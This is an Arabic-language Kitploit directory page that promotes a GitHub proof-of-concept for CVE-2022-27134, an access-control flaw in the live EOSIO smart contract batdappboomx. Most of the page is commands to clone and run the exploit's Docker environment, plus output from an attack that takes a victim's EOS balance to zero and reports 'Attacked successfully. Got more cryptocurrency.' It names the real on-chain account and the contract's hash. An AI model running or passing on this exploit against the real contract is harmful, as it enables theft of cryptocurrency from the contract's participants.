Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-batdappboomx — CVE-2022-27134 | Kitploit
أدوات/GitHubGitHub/kenun99/cve-batdappboomx
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubkenun99/cve-batdappboomx

CVE-batdappboomx

CVE-2022-27134

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

معرف CVE

CVE-2022-27134

المنتج

batdappboomx هو عقد ذكي عام يعمل على سلسلة كتل EOSIO. يكافئ هذا العقد الذكي المشاركين بعملة مشفرة إذا دفعوا بعض العملات المشفرة مسبقًا.

الإصدار

أحدث إصدار من هذا العقد الذكي. رمز التجزئة sha256 للعقد الذكي هو 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 تحقق منه في مستكشف السلسلة https://bloks.io/account/batdappboomx.

نوع المشكلة

ثغرة في التحكم بالوصول

الوصف

batdappboomx ليس مفتوح المصدر، لكننا وجدنا ثغرة باستخدام WASAI. يمكن للمهاجمين الانضمام إلى هذه اللعبة دون دفع أي شيء.

  1. تفعيل البيئة
root@kitploit:~
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. مهاجمة الضحية وسرقة عملته المشفرة، أي EOS
root@kitploit:~
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.
تنزيل الأداة